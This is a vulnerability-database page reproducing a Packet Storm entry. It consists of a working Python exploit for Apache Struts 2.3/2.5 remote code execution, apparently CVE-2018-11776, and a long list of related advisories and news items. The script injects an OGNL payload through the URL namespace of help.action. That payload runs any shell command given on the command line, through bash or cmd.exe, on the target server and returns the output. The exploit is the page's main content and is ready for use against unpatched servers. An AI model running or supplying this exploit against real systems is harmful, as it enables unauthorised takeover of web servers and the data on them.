Lucene search
Hook-s3cPACKETSTORM:149087HistoryAug 25, 2018 - 12:00 a.m.
Apache Struts 2.3 / 2.5 Remote Code Execution
2018-08-2500:00:00
hook-s3c
packetstormsecurity.com
121
0.976 High
EPSS
Percentile
100.0%
`#!/usr/bin/python
# -*- coding: utf-8 -*-
# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
import sys
import urllib
import urllib2
import httplib
def exploit(host,cmd):
print "[Execute]: {}".format(cmd)
ognl_payload = "${"
ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"
if not ":" in host:
host = "{}:8080".format(host)
# encode the payload
ognl_payload_encoded = urllib.quote_plus(ognl_payload)
# further encoding
url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))
print "[Url]: {}\n\n\n".format(url)
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response
if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])
`
Related
zdt
zdt
Apache Struts 2 Namespace Redirect OGNL Injection Exploit
2018-09-08 00:00:00
ibm
ibm
threatpost
threatpost
Slack Plugs Token Security Hole
2016-04-30 07:25:42
Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug
2015-06-03 07:37:04
Army Research Lab Releases Dshell Forensics Framework
2015-01-30 10:59:44
dsquare
dsquare
Apache Struts 2 Multiple Tags Result Namespace Handling RCE
2018-10-20 00:00:00
packetstorm
packetstorm
Apache Struts 2.3 / 2.5 Remote Code Execution
2018-08-26 00:00:00
Apache Struts 2 Namespace Redirect OGNL Injection
2018-09-07 00:00:00
nessus
nessus
exploitpack
exploitpack
Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)
2018-08-26 00:00:00
redhatcve
redhatcve
CVE-2018-11776
2018-08-22 08:49:33
akamaiblog
akamaiblog
Web Application and API Protection -- From SQL Injection to Magecart
2020-09-09 13:00:00
prion
prion
Remote code execution
2018-08-22 13:29:00
veracode
veracode
Remote Code Execution (RCE)
2018-08-22 17:36:38
openvas
openvas
Apache Struts Security Update (S2-057) - Version Check
2018-08-23 00:00:00
Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)
2020-06-05 00:00:00
Apache Struts Security Update (S2-057) - Active Check
2018-08-27 00:00:00
myhack58
myhack58
osv
osv
CVE-2018-11776
2018-08-22 13:29:00
checkpoint_advisories
checkpoint_advisories
Apache Struts Remote Code Execution (CVE-2018-11776)
2018-08-23 00:00:00
ubuntucve
ubuntucve
CVE-2018-11776
2018-08-22 00:00:00
github
github
Apache Struts vulnerable to remote command execution (RCE) due to improper input validation
2018-10-18 19:24:38
Bypassing OGNL sandboxes for fun and charities
2023-01-27 16:00:49
f5
f5
K60499474 : Apache Struts vulnerability CVE-2018-11776
2018-08-24 00:00:00
qualysblog
qualysblog
Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug
2018-08-27 18:32:33
Detecting Apache Struts 2 Namespace RCE: CVE-2018-11776
2018-08-23 20:27:19
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
talosblog
talosblog
Connecting the dots between recently active cryptominers
2018-12-18 08:33:00
metasploit
metasploit
Apache Struts 2 Namespace Redirect OGNL Injection
2018-08-31 18:48:22
kitploit
kitploit
Mitaka - A Browser Extension For OSINT Search
2019-09-21 12:00:00
Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts
2018-08-26 21:14:00
Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts
2019-05-12 13:09:00
cisco
cisco
nuclei
nuclei
Apache Struts2 S2-057 - Remote Code Execution
2021-02-24 04:29:30
attackerkb
attackerkb
trendmicroblog
trendmicroblog
Server Security for the Modern IT Ecosystem
2019-01-03 15:30:46
krebs
krebs
Experts Urge Rapid Patching of ‘Struts’ Bug
2018-08-23 20:22:35
cisa_kev
cisa_kev
Apache Struts Remote Code Execution Vulnerability
2021-11-03 00:00:00
cve
cve
CVE-2018-11776
2018-08-22 13:29:00
impervablog
impervablog
Read: Apache Struts Patches ‘Critical Vulnerability’ CVE-2018-11776
2018-08-23 14:25:36
exploitdb
exploitdb
Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit)
2018-09-10 00:00:00
Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)
2018-08-26 00:00:00
githubexploit
githubexploit
Exploit for Injection in Atlassian Confluence
2021-10-06 23:24:24
Exploit for Injection in Atlassian Confluence
2021-10-06 23:24:24
Exploit for Injection in Atlassian Confluence
2021-10-06 23:24:24
thn
thn
Cisco Issues Security Patch Updates for 32 Flaws in its Products
2018-09-06 08:45:00
New Apache Struts RCE Flaw Lets Hackers Take Over Web Servers
2018-08-22 14:04:00
rapid7blog
rapid7blog
Active Exploitation of Confluence CVE-2022-26134
2022-06-02 23:27:15
fireeye
fireeye
oracle
oracle
Oracle Critical Patch Update Advisory - January 2019
2019-01-15 00:00:00
Oracle Critical Patch Update - October 2018
2018-12-18 00:00:00
Oracle Critical Patch Update Advisory - July 2020
2020-07-14 00:00:00